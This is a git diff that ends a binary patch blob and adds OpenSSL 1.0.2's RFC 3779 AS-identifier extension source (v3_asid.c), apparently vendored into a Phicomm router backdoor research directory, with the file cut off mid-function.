zN~OMKMRVKIKyOD+Pk$$lPhTf&p$U3bEa+PXLIE_L2FPHDKljv6=u`~+Kxgj&n-pjv
z3j^TH8`%5MW<Bd^5KQ*cySyzBtmwue<{gE&?H}OxIN?y;tzwqSih<TZx2`Bne0pPF
zxcKe$HSDZoT17bSBukE4{g_}nROZ4VIsUGQ3Hd#6Nd7EBNXV<;ko-q*j|n+`TS~qU
zAtdBAa7aFa5EAlva7g|ZLP*H*TTt@<L<k8v{>O#nxX#9eoc4E`1)oXyLZ~D4$nOl)
zb1&ie4*-~8`J>=ZSyKK<!tong@@EJyBK$?dsr+8TaUCV~93Y&^A13^IB7cnV8wmfB
z@EZvqgB^l|mkDslc8di^Kd6MyBD{|98o}{`dmmCyC*d~{{;=Svzn<{#5qVr=NIkC*
zUPAaUE%e}e7Zd9Dz#;V<A$o2h{NF9)FA(`}5&0rmZ(&0HUO1%wDS~6QTM56N$S)$i
zmhc9`Hxlk6d@JFL2{#C@B|I)T+JkZHgagxY!Y4sq+JBPp$%LOHd<x<D=m1Ele<~bO
z&qTtVggXVt3+@d`d0cm5LOr*^A^8HrrxEV6(6fecoCBqvM~I%=3I9Hkr}pe2@-8C(
zGT}5HUbE0MO5{t4o{uf$za;W^5c%^&ektK8!m0g*;`<E!N#k&W;8=~yPb0jU=-)s%
zomU?xoX*cL6HevX|CE7Vv<KtR0|%zx6Zsa%%klb(aNMhtJWp)3qWx`z-$giWcY)y8
z?wv%wj>zNQq15jud>P@LgySBil;24>ZTD%xvEAuJ{y8E~+x;=&%ZdCx!dDRf4&hY(
zIN>XaybYZW3H`PT4r%{n!XF^Kobc6zFCrZGG^CzR!Lh$H2=62ExVI|hcM$#{;Xfpt
z#={GQcM$o5gs&z1bHeGkTr0kJ(GQ(Oej4F)J<v-y)iWeG_LshAhlzZM=zpHbPaym!
z7V^I!^7MTjw~+rmk)KKQAGeVIg2>Mz^5-n%^Tl^R_V+F#KTdG;C++VfB7ZlLcUj2S
z6HfiyM)Z^sJu8SjeU9ECd<l_H5>EAhML2z*=83Ib?C-aU9*5xO{>~)w<wXA5M1DQt
zO@#Xhf0*zt!VSW^34ez04TQf&IPLE!;k4cN2wzO}94DNvx6cv2k;q?r9b_P(f7Zbv
zpZ8k`r+P{Sp9!+`xhp5~_?wN?vs7^NbJt7cmk{|U2&aD7Lpbg4&j_dS92XqhrQ>^u
z$kXvXK{)mEdBUmwv0}dp^}C7vMS`P0ss5RSQ$N=bPW@ajxY^H5M81c#yN&QAgzq7o
z`txPNX}hlwPW^CzaO(eG6HfbeTyV4fpAq>UV&~tA^(y*}+7DTl(9d{$*T(ZGhe`6^
z2`;9?G(RP{Xg1C9cM?qa?S@I}nSnQuCh$v|zboYNTLzPqzfs8JnjDkl0l}S&X82^$
zPnU@w6@0ph+eAn2GVz-P$JoXs+x=4L!Li09Iqv&ns^XV4FAyBpgqWnfDtIlU86Fkf
zW8$R+9B3wfQLJzLCjN$a-#451VZqx>d_-_uJ7JP`t`hojErdyOspmmPGyFrLCurhD
zLJ!X2n53T5qF*wuFbw*c1V7b^d*rh3h~zzT)FuCaU;qmtnf1KHG2^l>qJJP9^~nEE
zI6^qJrx+DOGTY;1G}AAU6~C`%xcvQ2wk!Q0e;51Oq(}aqHCwbR<>l{9kC?dp{o;g)
z%ik$3nz-z*2Ngq-`lUa2o4EWPK`9&D(yMo@g{vOs*DiS%4)t`D>9DV-l(CJ^vbFGk
zh-Kk^%%Hft40hR>5N9I8iUEV9Qr6ku+Y8&-N?BjO9x8+X=(?M23XA;uzDU_XxPKr7
z{~;-Ahq_=-5O>@EZ;}(#psPgKrj^!;y9;u{6M5m*v>bk8;-g%fCj925Y5ZDJ#IJb4
zx`jNO{{NCY1Q*kdD1|-8@#)*F8*}?OpP|nGZGC*_qRt99Xp-%(F*PW&^6G_3crU^y
zt>RhSw1d>cFX^+G_R{%UxXb0gI2r~?{vQ?k568&tKm1n0_Ralw3ct(WyFi2`r?|=s
z?giv(UlS95TnM5%Y}?#Ee%oRD<#5onyqM=^Q3&_aZ}Qqj7!{3*`jp|ltS9+qxWTE|
z?El9_eWw%@S82b*Pr(i9G}nJg)Q_7A%=KeXH<$kk=kON($S(@|4?|kkFA+Rf+gQ|v
yAAgV@8OyI|P9+@X`qu(8k3H5nIT_FJ58kGLGy4zskaN|)DC~cZX~~?-_5TM<_|b#_

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3_asid.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3_asid.c
new file mode 100644
index 0000000..2a32c9d
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3_asid.c
@@ -0,0 +1,896 @@
+/*
+ * Contributed to the OpenSSL Project by the American Registry for
+ * Internet Numbers ("ARIN").
+ */
+/* ====================================================================
+ * Copyright (c) 2006 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ */
+
+/*
+ * Implementation of RFC 3779 section 3.2.
+ */
+
+#include <stdio.h>
+#include <string.h>
+#include "cryptlib.h"
+#include <openssl/conf.h>
+#include <openssl/asn1.h>
+#include <openssl/asn1t.h>
+#include <openssl/x509v3.h>
+#include <openssl/x509.h>
+#include <openssl/bn.h>
+
+#ifndef OPENSSL_NO_RFC3779
+
+/*
+ * OpenSSL ASN.1 template translation of RFC 3779 3.2.3.
+ */
+
+ASN1_SEQUENCE(ASRange) = {
+  ASN1_SIMPLE(ASRange, min, ASN1_INTEGER),
+  ASN1_SIMPLE(ASRange, max, ASN1_INTEGER)
+} ASN1_SEQUENCE_END(ASRange)
+
+ASN1_CHOICE(ASIdOrRange) = {
+  ASN1_SIMPLE(ASIdOrRange, u.id,    ASN1_INTEGER),
+  ASN1_SIMPLE(ASIdOrRange, u.range, ASRange)
+} ASN1_CHOICE_END(ASIdOrRange)
+
+ASN1_CHOICE(ASIdentifierChoice) = {
+  ASN1_SIMPLE(ASIdentifierChoice,      u.inherit,       ASN1_NULL),
+  ASN1_SEQUENCE_OF(ASIdentifierChoice, u.asIdsOrRanges, ASIdOrRange)
+} ASN1_CHOICE_END(ASIdentifierChoice)
+
+ASN1_SEQUENCE(ASIdentifiers) = {
+  ASN1_EXP_OPT(ASIdentifiers, asnum, ASIdentifierChoice, 0),
+  ASN1_EXP_OPT(ASIdentifiers, rdi,   ASIdentifierChoice, 1)
+} ASN1_SEQUENCE_END(ASIdentifiers)
+
+IMPLEMENT_ASN1_FUNCTIONS(ASRange)
+IMPLEMENT_ASN1_FUNCTIONS(ASIdOrRange)
+IMPLEMENT_ASN1_FUNCTIONS(ASIdentifierChoice)
+IMPLEMENT_ASN1_FUNCTIONS(ASIdentifiers)
+
+/*
+ * i2r method for an ASIdentifierChoice.
+ */
+static int i2r_ASIdentifierChoice(BIO *out,
+                                  ASIdentifierChoice *choice,
+                                  int indent, const char *msg)
+{
+    int i;
+    char *s;
+    if (choice == NULL)
+        return 1;
+    BIO_printf(out, "%*s%s:\n", indent, "", msg);
+    switch (choice->type) {
+    case ASIdentifierChoice_inherit:
+        BIO_printf(out, "%*sinherit\n", indent + 2, "");
+        break;
+    case ASIdentifierChoice_asIdsOrRanges:
+        for (i = 0; i < sk_ASIdOrRange_num(choice->u.asIdsOrRanges); i++) {
+            ASIdOrRange *aor =
+                sk_ASIdOrRange_value(choice->u.asIdsOrRanges, i);
+            switch (aor->type) {
+            case ASIdOrRange_id:
+                if ((s = i2s_ASN1_INTEGER(NULL, aor->u.id)) == NULL)
+                    return 0;
+                BIO_printf(out, "%*s%s\n", indent + 2, "", s);
+                OPENSSL_free(s);
+                break;
+            case ASIdOrRange_range:
+                if ((s = i2s_ASN1_INTEGER(NULL, aor->u.range->min)) == NULL)
+                    return 0;
+                BIO_printf(out, "%*s%s-", indent + 2, "", s);
+                OPENSSL_free(s);
+                if ((s = i2s_ASN1_INTEGER(NULL, aor->u.range->max)) == NULL)
+                    return 0;
+                BIO_printf(out, "%s\n", s);
+                OPENSSL_free(s);
+                break;
+            default:
+                return 0;
+            }
+        }
+        break;
+    default:
+        return 0;
+    }
+    return 1;
+}
+
+/*
+ * i2r method for an ASIdentifier extension.
+ */
+static int i2r_ASIdentifiers(const X509V3_EXT_METHOD *method,
+                             void *ext, BIO *out, int indent)
+{
+    ASIdentifiers *asid = ext;
+    return (i2r_ASIdentifierChoice(out, asid->asnum, indent,
+                                   "Autonomous System Numbers") &&
+            i2r_ASIdentifierChoice(out, asid->rdi, indent,
+                                   "Routing Domain Identifiers"));
+}
+
+/*
+ * Sort comparision function for a sequence of ASIdOrRange elements.
+ */
+static int ASIdOrRange_cmp(const ASIdOrRange *const *a_,
+                           const ASIdOrRange *const *b_)
+{
+    const ASIdOrRange *a = *a_, *b = *b_;
+
+    OPENSSL_assert((a->type == ASIdOrRange_id && a->u.id != NULL) ||
+                   (a->type == ASIdOrRange_range && a->u.range != NULL &&
+                    a->u.range->min != NULL && a->u.range->max != NULL));
+
+    OPENSSL_assert((b->type == ASIdOrRange_id && b->u.id != NULL) ||
+                   (b->type == ASIdOrRange_range && b->u.range != NULL &&
+                    b->u.range->min != NULL && b->u.range->max != NULL));
+
+    if (a->type == ASIdOrRange_id && b->type == ASIdOrRange_id)
+        return ASN1_INTEGER_cmp(a->u.id, b->u.id);
+
+    if (a->type == ASIdOrRange_range && b->type == ASIdOrRange_range) {
+        int r = ASN1_INTEGER_cmp(a->u.range->min, b->u.range->min);
+        return r != 0 ? r : ASN1_INTEGER_cmp(a->u.range->max,
+                                             b->u.range->max);
+    }
+
+    if (a->type == ASIdOrRange_id)
+        return ASN1_INTEGER_cmp(a->u.id, b->u.range->min);
+    else
+        return ASN1_INTEGER_cmp(a->u.range->min, b->u.id);
+}
+
+/*
+ * Add an inherit element.
+ */
+int v3_asid_add_inherit(ASIdentifiers *asid, int which)
+{
+    ASIdentifierChoice **choice;
+    if (asid == NULL)
+        return 0;
+    switch (which) {
+    case V3_ASID_ASNUM:
+        choice = &asid->asnum;
+        break;
+    case V3_ASID_RDI:
+        choice = &asid->rdi;
+        break;
+    default:
+        return 0;
+    }
+    if (*choice == NULL) {
+        if ((*choice = ASIdentifierChoice_new()) == NULL)
+            return 0;
+        OPENSSL_assert((*choice)->u.inherit == NULL);
+        if (((*choice)->u.inherit = ASN1_NULL_new()) == NULL)
+            return 0;
+        (*choice)->type = ASIdentifierChoice_inherit;
+    }
+    return (*choice)->type == ASIdentifierChoice_inherit;
+}
+
+/*
+ * Add an ID or range to an ASIdentifierChoice.
+ */
+int v3_asid_add_id_or_range(ASIdentifiers *asid,
+                            int which, ASN1_INTEGER *min, ASN1_INTEGER *max)
+{
+    ASIdentifierChoice **choice;
+    ASIdOrRange *aor;
+    if (asid == NULL)
+        return 0;
+    switch (which) {
+    case V3_ASID_ASNUM:
+        choice = &asid->asnum;
+        break;
+    case V3_ASID_RDI:
+        choice = &asid->rdi;
+        break;
+    default:
+        return 0;
+    }
+    if (*choice != NULL && (*choice)->type == ASIdentifierChoice_inherit)
+        return 0;
+    if (*choice == NULL) {
+        if ((*choice = ASIdentifierChoice_new()) == NULL)
+            return 0;
+        OPENSSL_assert((*choice)->u.asIdsOrRanges == NULL);
+        (*choice)->u.asIdsOrRanges = sk_ASIdOrRange_new(ASIdOrRange_cmp);
+        if ((*choice)->u.asIdsOrRanges == NULL)
+            return 0;
+        (*choice)->type = ASIdentifierChoice_asIdsOrRanges;
+    }
+    if ((aor = ASIdOrRange_new()) == NULL)
+        return 0;
+    if (max == NULL) {
+        aor->type = ASIdOrRange_id;
+        aor->u.id = min;
+    } else {
+        aor->type = ASIdOrRange_range;
+        if ((aor->u.range = ASRange_new()) == NULL)
+            goto err;
+        ASN1_INTEGER_free(aor->u.range->min);
+        aor->u.range->min = min;
+        ASN1_INTEGER_free(aor->u.range->max);
+        aor->u.range->max = max;
+    }
+    if (!(sk_ASIdOrRange_push((*choice)->u.asIdsOrRanges, aor)))
+        goto err;
+    return 1;
+
+ err:
+    ASIdOrRange_free(aor);
+    return 0;
+}
+
+/*
+ * Extract min and max values from an ASIdOrRange.
+ */
+static void extract_min_max(ASIdOrRange *aor,
+                            ASN1_INTEGER **min, ASN1_INTEGER **max)
+{
+    OPENSSL_assert(aor != NULL && min != NULL && max != NULL);
+    switch (aor->type) {
+    case ASIdOrRange_id:
+        *min = aor->u.id;
+        *max = aor->u.id;
+        return;
+    case ASIdOrRange_range:
+        *min = aor->u.range->min;
+        *max = aor->u.range->max;
+        return;
+    }
+}
+
+/*
+ * Check whether an ASIdentifierChoice is in canonical form.
+ */
+static int ASIdentifierChoice_is_canonical(ASIdentifierChoice *choice)
+{
+    ASN1_INTEGER *a_max_plus_one = NULL;
+    BIGNUM *bn = NULL;
+    int i, ret = 0;
+
+    /*
+     * Empty element or inheritance is canonical.
+     */
+    if (choice == NULL || choice->type == ASIdentifierChoice_inherit)
+        return 1;
+
+    /*
+     * If not a list, or if empty list, it's broken.
+     */
+    if (choice->type != ASIdentifierChoice_asIdsOrRanges ||
+        sk_ASIdOrRange_num(choice->u.asIdsOrRanges) == 0)
+        return 0;
+
+    /*
+     * It's a list, check it.
+     */
+    for (i = 0; i < sk_ASIdOrRange_num(choice->u.asIdsOrRanges) - 1; i++) {
+        ASIdOrRange *a = sk_ASIdOrRange_value(choice->u.asIdsOrRanges, i);
+        ASIdOrRange *b = sk_ASIdOrRange_value(choice->u.asIdsOrRanges, i + 1);
+        ASN1_INTEGER *a_min, *a_max, *b_min, *b_max;
+
+        extract_min_max(a, &a_min, &a_max);
+        extract_min_max(b, &b_min, &b_max);
+
+        /*
+         * Punt misordered list, overlapping start, or inverted range.
+         */
+        if (ASN1_INTEGER_cmp(a_min, b_min) >= 0 ||
+            ASN1_INTEGER_cmp(a_min, a_max) > 0 ||
+            ASN1_INTEGER_cmp(b_min, b_max) > 0)
+            goto done;
+
+        /*
+         * Calculate a_max + 1 to check for adjacency.
+         */
+        if ((bn == NULL && (bn = BN_new()) == NULL) ||
+            ASN1_INTEGER_to_BN(a_max, bn) == NULL ||
+            !BN_add_word(bn, 1) ||
+            (a_max_plus_one =
+             BN_to_ASN1_INTEGER(bn, a_max_plus_one)) == NULL) {
+            X509V3err(X509V3_F_ASIDENTIFIERCHOICE_IS_CANONICAL,
+                      ERR_R_MALLOC_FAILURE);
+            goto done;
+        }
+
+        /*
+         * Punt if adjacent or overlapping.
+         */
+        if (ASN1_INTEGER_cmp(a_max_plus_one, b_min) >= 0)
+            goto done;
+    }
+
+    /*
+     * Check for inverted range.
+     */
+    i = sk_ASIdOrRange_num(choice->u.asIdsOrRanges) - 1;
+    {
+        ASIdOrRange *a = sk_ASIdOrRange_value(choice->u.asIdsOrRanges, i);
+        ASN1_INTEGER *a_min, *a_max;
+        if (a != NULL && a->type == ASIdOrRange_range) {
+            extract_min_max(a, &a_min, &a_max);
+            if (ASN1_INTEGER_cmp(a_min, a_max) > 0)
+                goto done;
+        }
+    }
+
+    ret = 1;
+
+ done:
+    ASN1_INTEGER_free(a_max_plus_one);
+    BN_free(bn);
+    return ret;
+}
+
+/*
+ * Check whether an ASIdentifier extension is in canonical form.
+ */
+int v3_asid_is_canonical(ASIdentifiers *asid)
+{
+    return (asid == NULL ||
+            (ASIdentifierChoice_is_canonical(asid->asnum) &&
+             ASIdentifierChoice_is_canonical(asid->rdi)));
+}
+
+/*
+ * Whack an ASIdentifierChoice into canonical form.
+ */
+static int ASIdentifierChoice_canonize(ASIdentifierChoice *choice)
+{
+    ASN1_INTEGER *a_max_plus_one = NULL;
+    BIGNUM *bn = NULL;
+    int i, ret = 0;
+
+    /*
+     * Nothing to do for empty element or inheritance.
+     */
+    if (choice == NULL || choice->type == ASIdentifierChoice_inherit)
+        return 1;
+
+    /*
+     * If not a list, or if empty list, it's broken.
+     */
+    if (choice->type != ASIdentifierChoice_asIdsOrRanges ||
+        sk_ASIdOrRange_num(choice->u.asIdsOrRanges) == 0) {
+        X509V3err(X509V3_F_ASIDENTIFIERCHOICE_CANONIZE,
+                  X509V3_R_EXTENSION_VALUE_ERROR);
+        return 0;
+    }
+
+    /*
+     * We have a non-empty list.  Sort it.
+     */
+    sk_ASIdOrRange_sort(choice->u.asIdsOrRanges);
+
+    /*
+     * Now check for errors and suboptimal encoding, rejecting the
+     * former and fixing the latter.
+     */
+    for (i = 0; i < sk_ASIdOrRange_num(choice->u.asIdsOrRanges) - 1; i++) {
+        ASIdOrRange *a = sk_ASIdOrRange_value(choice->u.asIdsOrRanges, i);
+        ASIdOrRange *b = sk_ASIdOrRange_value(choice->u.asIdsOrRanges, i + 1);
+        ASN1_INTEGER *a_min, *a_max, *b_min, *b_max;
+
+        extract_min_max(a, &a_min, &a_max);
+        extract_min_max(b, &b_min, &b_max);
+
+        /*
+         * Make sure we're properly sorted (paranoia).
+         */
+        OPENSSL_assert(ASN1_INTEGER_cmp(a_min, b_min) <= 0);
+
+        /*
+         * Punt inverted ranges.
+         */
+        if (ASN1_INTEGER_cmp(a_min, a_max) > 0 ||
+            ASN1_INTEGER_cmp(b_min, b_max) > 0)
+            goto done;
+
+        /*
+         * Check for overlaps.
+         */
+        if (ASN1_INTEGER_cmp(a_max, b_min) >= 0) {
+            X509V3err(X509V3_F_ASIDENTIFIERCHOICE_CANONIZE,
+                      X509V3_R_EXTENSION_VALUE_ERROR);
+            goto done;
+        }
+
+        /*
+         * Calculate a_max + 1 to check for adjacency.
+         */
+        if ((bn == NULL && (bn = BN_new()) == NULL) ||
+            ASN1_INTEGER_to_BN(a_max, bn) == NULL ||
+            !BN_add_word(bn, 1) ||
+            (a_max_plus_one =
+             BN_to_ASN1_INTEGER(bn, a_max_plus_one)) == NULL) {
+            X509V3err(X509V3_F_ASIDENTIFIERCHOICE_CANONIZE,
+                      ERR_R_MALLOC_FAILURE);
+            goto done;
+        }
+
+        /*
+         * If a and b are adjacent, merge them.
+         */
+        if (ASN1_INTEGER_cmp(a_max_plus_one, b_min) == 0) {
+            ASRange *r;
+            switch (a->type) {
+            case ASIdOrRange_id:
+                if ((r = OPENSSL_malloc(sizeof(ASRange))) == NULL) {
+                    X509V3err(X509V3_F_ASIDENTIFIERCHOICE_CANONIZE,
+                              ERR_R_MALLOC_FAILURE);
+                    goto done;
+                }
+                r->min = a_min;
+                r->max = b_max;
+                a->type = ASIdOrRange_range;
+                a->u.range = r;
+                break;
+            case ASIdOrRange_range:
+                ASN1_INTEGER_free(a->u.range->max);
+                a->u.range->max = b_max;
+                break;
+            }
+            switch (b->type) {
+            case ASIdOrRange_id:
+                b->u.id = NULL;
+                break;
+            case ASIdOrRange_range:
+                b->u.range->max = NULL;
+                break;
+            }
+            ASIdOrRange_free(b);
+            (void)sk_ASIdOrRange_delete(choice->u.asIdsOrRanges, i + 1);
+            i--;
+            continue;
+        }
+    }
+
+    /*
+     * Check for final inverted range.
+     */
+    i = sk_ASIdOrRange_num(choice->u.asIdsOrRanges) - 1;
+    {
+        ASIdOrRange *a = sk_ASIdOrRange_value(choice->u.asIdsOrRanges, i);
+        ASN1_INTEGER *a_min, *a_max;
+        if (a != NULL && a->type == ASIdOrRange_range) {
+            extract_min_max(a, &a_min, &a_max);
+            if (ASN1_INTEGER_cmp(a_min, a_max) > 0)
+                goto done;
+        }
+    }
+
+    OPENSSL_assert(ASIdentifierChoice_is_canonical(choice)); /* Paranoia */
+
+    ret = 1;
+
+ done:
+    ASN1_INTEGER_free(a_max_plus_one);
+    BN_free(bn);
+    return ret;
+}
+
+/*
+ * Whack an ASIdentifier extension into canonical form.
+ */
+int v3_asid_canonize(ASIdentifiers *asid)
+{
+    return (asid == NULL ||
+            (ASIdentifierChoice_canonize(asid->asnum) &&
+             ASIdentifierChoice_canonize(asid->rdi)));
+}
+
+/*
+ * v2i method for an ASIdentifier extension.
+ */
+static void *v2i_ASIdentifiers(const struct v3_ext_method *method,
+                               struct v3_ext_ctx *ctx,
+                               STACK_OF(CONF_VALUE) *values)
+{
+    ASN1_INTEGER *min = NULL, *max = NULL;
+    ASIdentifiers *asid = NULL;
+    int i;
+
+    if ((asid = ASIdentifiers_new()) == NULL) {
+        X509V3err(X509V3_F_V2I_ASIDENTIFIERS, ERR_R_MALLOC_FAILURE);
+        return NULL;
+    }
+
+    for (i = 0; i < sk_CONF_VALUE_num(values); i++) {
+        CONF_VALUE *val = sk_CONF_VALUE_value(values, i);
+        int i1, i2, i3, is_range, which;
+
+        /*
+         * Figure out whether this is an AS or an RDI.
+         */
+        if (!name_cmp(val->name, "AS")) {
+            which = V3_ASID_ASNUM;
+        } else if (!name_cmp(val->name, "RDI")) {
+            which = V3_ASID_RDI;
+        } else {
+            X509V3err(X509V3_F_V2I_ASIDENTIFIERS,
+                      X509V3_R_EXTENSION_NAME_ERROR);
+            X509V3_conf_err(val);
+            goto err;
+        }
+
+        /*
+         * Handle inheritance.
+         */
+        if (!strcmp(val->value, "inherit")) {
+            if (v3_asid_add_inherit(asid, which))
+                continue;
+            X509V3err(X509V3_F_V2I_ASIDENTIFIERS,
+                      X509V3_R_INVALID_INHERITANCE);
+            X509V3_conf_err(val);
+            goto err;
+        }
+
+        /*
+         * Number, range, or mistake, pick it apart and figure out which.
+         */
+        i1 = strspn(val->value, "0123456789");
+        if (val->value[i1] == '\0') {
+            is_range = 0;
+        } else {
+            is_range = 1;
+            i2 = i1 + strspn(val->value + i1, " \t");
+            if (val->value[i2] != '-') {
+                X509V3err(X509V3_F_V2I_ASIDENTIFIERS,
+                          X509V3_R_INVALID_ASNUMBER);
+                X509V3_conf_err(val);
+                goto err;
+            }
+            i2++;
+            i2 = i2 + strspn(val->value + i2, " \t");
+            i3 = i2 + strspn(val->value + i2, "0123456789");
+            if (val->value[i3] != '\0') {
+                X509V3err(X509V3_F_V2I_ASIDENTIFIERS,
+                          X509V3_R_INVALID_ASRANGE);
+                X509V3_conf_err(val);
+                goto err;
+            }
+        }
+
+        /*
+         * Syntax is ok, read and add it.
+         */
+        if (!is_range) {
+            if (!X509V3_get_value_int(val, &min)) {
+                X509V3err(X509V3_F_V2I_ASIDENTIFIERS, ERR_R_MALLOC_FAILURE);
+                goto err;
+            }
+        } else {
+            char *s = BUF_strdup(val->value);
+            if (s == NULL) {
+                X509V3err(X509V3_F_V2I_ASIDENTIFIERS, ERR_R_MALLOC_FAILURE);
+                goto err;
+            }
+            s[i1] = '\0';
+            min = s2i_ASN1_INTEGER(NULL, s);
+            max = s2i_ASN1_INTEGER(NULL, s + i2);
+            OPENSSL_free(s);
+            if (min == NULL || max == NULL) {
+                X509V3err(X509V3_F_V2I_ASIDENTIFIERS, ERR_R_MALLOC_FAILURE);
+                goto err;
+            }
+            if (ASN1_INTEGER_cmp(min, max) > 0) {
+                X509V3err(X509V3_F_V2I_ASIDENTIFIERS,
+                          X509V3_R_EXTENSION_VALUE_ERROR);
+                goto err;
+            }
+        }
+        if (!v3_asid_add_id_or_range(asid, which, min, max)) {
+            X509V3err(X509V3_F_V2I_ASIDENTIFIERS, ERR_R_MALLOC_FAILURE);
+            goto err;
+        }
+        min = max = NULL;
+    }
+
+    /*
+     * Canonize the result, then we're done.
+     */
+    if (!v3_asid_canonize(asid))
+        goto err;
+    return asid;
+
+ err:
+    ASIdentifiers_free(asid);
+    ASN1_INTEGER_free(min);
+    ASN1_INTEGER_free(max);
+    return NULL;
+}
+
+/*
+ * OpenSSL dispatch.
+ */
+const X509V3_EXT_METHOD v3_asid = {
+    NID_sbgp_autonomousSysNum,  /* nid */
+    0,                          /* flags */
+    ASN1_ITEM_ref(ASIdentifiers), /* template */
+    0, 0, 0, 0,                 /* old functions, ignored */
+    0,                          /* i2s */
+    0,                          /* s2i */
+    0,                          /* i2v */
+    v2i_ASIdentifiers,          /* v2i */
+    i2r_ASIdentifiers,          /* i2r */
+    0,                          /* r2i */
+    NULL                        /* extension-specific data */
+};
+
+/*
+ * Figure out whether extension uses inheritance.
+ */
+int v3_asid_inherits(ASIdentifiers *asid)
+{
+    return (asid != NULL &&
+            ((asid->asnum != NULL &&
+              asid->asnum->type == ASIdentifierChoice_inherit) ||
+             (asid->rdi != NULL &&
+              asid->rdi->type == ASIdentifierChoice_inherit)));
+}
+
+/*
+ * Figure out whether parent contains child.
+ */
+static int asid_contains(ASIdOrRanges *parent, ASIdOrRanges *child)
+{
+    ASN1_INTEGER *p_min, *p_max, *c_min, *c_max;
+    int p, c;
+
+    if (child == NULL || parent == child)
+        return 1;
+    if (parent == NULL)
+        return 0;
+
+    p = 0;
+    for (c = 0; c < sk_ASIdOrRange_num(child); c++) {
+        extract_min_max(sk_ASIdOrRange_value(child, c), &c_min, &c_max);
+        for (;; p++) {
+            if (p >= sk_ASIdOrRange_num(parent))
+                return 0;
+            extract_min_max(sk_ASIdOrRange_value(parent, p), &p_min, &p_max);
+            if (ASN1_INTEGER_cmp(p_max, c_max) < 0)
+                continue;
+            if (ASN1_INTEGER_cmp(p_min, c_min) > 0)
+                return 0;
+            break;
+        }
+    }
+
+    return 1;
+}
+
+/*
+ * Test whether a is a subet of b.
+ */
+int v3_asid_subset(ASIdentifiers *a, ASIdentifiers *b)
+{
+    return (a == NULL ||
+            a == b ||
+            (b != NULL &&
+             !v3_asid_inherits(a) &&
+             !v3_asid_inherits(b) &&
+             asid_contains(b->asnum->u.asIdsOrRanges,
+                           a->asnum->u.asIdsOrRanges) &&
+             asid_contains(b->rdi->u.asIdsOrRanges,
+                           a->rdi->u.asIdsOrRanges)));
+}
+
+/*
+ * Validation error handling via callback.
+ */
+# define validation_err(_err_)           \
+  do {                                  \
+    if (ctx != NULL) {                  \
+      ctx->error = _err_;               \
+      ctx->error_depth = i;             \
+      ctx->current_cert = x;            \
+      ret = ctx->verify_cb(0, ctx);     \
+    } else {                            \
+      ret = 0;                          \
+    }                                   \
+    if (!ret)                           \
+      goto done;                        \
+  } while (0)
+
+/*
+ * Core code for RFC 3779 3.3 path validation.
+ */
+static int v3_asid_validate_path_internal(X509_STORE_CTX *ctx,
+                                          STACK_OF(X509) *chain,
+                                          ASIdentifiers *ext)
+{
+    ASIdOrRanges *child_as = NULL, *child_rdi = NULL;
+    int i, ret = 1, inherit_as = 0, inherit_rdi = 0;
+    X509 *x;
+
+    OPENSSL_assert(chain != NULL && sk_X509_num(chain) > 0);
+    OPENSSL_assert(ctx != NULL || ext != NULL);
+    OPENSSL_assert(ctx == NULL || ctx->verify_cb != NULL);
+
+    /*
+     * Figure out where to start.  If we don't have an extension to
+     * check, we're done.  Otherwise, check canonical form and
+     * set up for walking up the chain.
+     */
+    if (ext != NULL) {
+        i = -1;
+        x = NULL;
+    } else {
+        i = 0;
+        x = sk_X509_value(chain, i);
+        OPENSSL_assert(x != NULL);
+        if ((ext = x->rfc3779_asid) == NULL)
+            goto done;
+    }
+    if (!v3_asid_is_canonical(ext))
+        validation_err(X509_V_ERR_INVALID_EXTENSION);
+    if (ext->asnum != NULL) {
+        switch (ext->asnum->type) {
+        case ASIdentifierChoice_inherit:
+            inherit_as = 1;
+            break;
+        case ASIdentifierChoice_asIdsOrRanges:
+            child_as = ext->asnum->u.asIdsOrRanges;
+            break;
+        }
+    }
+    if (ext->rdi != NULL) {
+        switch (ext->rdi->type) {
+        case ASIdentifierChoice_inherit:
+            inherit_rdi = 1;
+            break;
